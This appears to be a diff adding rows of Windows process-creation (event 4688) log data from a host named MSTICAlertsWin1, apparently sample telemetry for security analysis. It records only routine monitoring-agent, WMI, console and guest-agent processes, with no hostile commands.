+294,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:24:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x364,C:\Windows\System32\conhost.exe,%%1936,0x11e8,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:24:24.017
+295,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:24:25.307,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc08,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:24:25.307
+296,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:24:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x338,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:24:26.000
+297,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xfbc,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:24.000
+298,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x640,C:\Windows\System32\conhost.exe,%%1936,0xfbc,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:24.017
+299,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:25.867,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1320,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:25.867
+300,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13b0,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:26.007
+301,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:37.180,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1388,C:\Windows\System32\cmd.exe,%%1936,0x690,"""cmd""",C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:37.180
+302,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:37.193,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11c8,C:\Windows\System32\conhost.exe,%%1936,0x1388,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:37.193
+303,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:21:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x544,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:21:26.000
+304,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:22:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x894,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:22:24.017
+305,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:22:24.030,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xde8,C:\Windows\System32\conhost.exe,%%1936,0x894,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:22:24.030
+306,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:22:25.360,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x778,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:22:25.360
+307,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:22:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x2f8,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:22:26.010
+308,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:15:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x364,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:15:26.000
+309,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:16:24.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1c4,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:16:24.007
+310,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:16:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x99c,C:\Windows\System32\conhost.exe,%%1936,0x1c4,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:16:24.027
+311,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:16:25.550,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10c8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:16:25.550
+312,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:16:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13e0,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:16:26.000
+313,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:22:24.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1550,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:22:24.007
+314,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:22:24.023,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x15d0,C:\Windows\System32\conhost.exe,%%1936,0x1550,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:22:24.023
+315,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:22:25.863,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13b4,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:22:25.863
+316,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:22:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x16d0,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:22:26.007
+317,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:23:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11a8,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:23:26.000
+318,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:51:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x244,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:51:26.000
+319,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:52:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1050,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:52:24.000
+320,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:52:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x690,C:\Windows\System32\conhost.exe,%%1936,0x1050,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:52:24.020
+321,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:52:25.613,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:52:25.613
+322,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:52:26.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1364,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:52:26.013
+323,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:59:26.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1148,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:59:26.017
+324,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:00:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10e0,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:00:24.003
+325,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:00:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x12fc,C:\Windows\System32\conhost.exe,%%1936,0x10e0,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:00:24.017
+326,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:00:25.363,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x5cc,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:00:25.363
+327,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:00:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x518,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:00:26.000
+328,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:03:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xf84,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:03:26.000
+329,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:04:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd64,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:04:24.000
+330,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:04:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc18,C:\Windows\System32\conhost.exe,%%1936,0xd64,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:04:24.020
+331,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:04:25.837,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb50,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:04:25.837
+332,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:04:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10a4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:04:26.007
+333,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:01:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13b4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:01:26.007
+334,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:01:52.640,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xe3c,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:01:52.640
+335,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd64,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:24.000
+336,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc18,C:\Windows\System32\conhost.exe,%%1936,0xd64,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:24.027
+337,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:25.293,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10e0,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:25.293
+338,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:26.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x108c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:26.003
+339,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:28.260,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x28c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF-64\DesiredStateConfiguration\DscRun.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF-64/DesiredStateConfiguration\DscRun.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\work\Registry.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\work""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:28.260
+340,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:28.270,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11b4,C:\Windows\System32\conhost.exe,%%1936,0x28c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF-64\DesiredStateConfiguration\DscRun.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:28.270
+341,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:55:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xddc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:55:26.000
